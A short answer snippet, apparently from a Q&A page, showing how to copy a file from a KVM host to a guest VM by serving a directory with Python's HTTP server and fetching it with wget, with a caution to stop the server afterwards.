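# On the host: serve a directory over HTTP (Python 3 assumed present).
python3 -m http.server 8000 --directory /path/to/files

# Inside the guest: fetch the file. On libvirt's default NAT network
# the host is usually reachable at 192.168.122.1.
wget http://192.168.122.1:8000/config.yaml
```

Stop the server with Ctrl-C once the transfer is done, since it exposes the whole directory to anything that can reach that port.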
| How to send/upload a file from Host OS to guest OS in KVM?(not folder sharing) |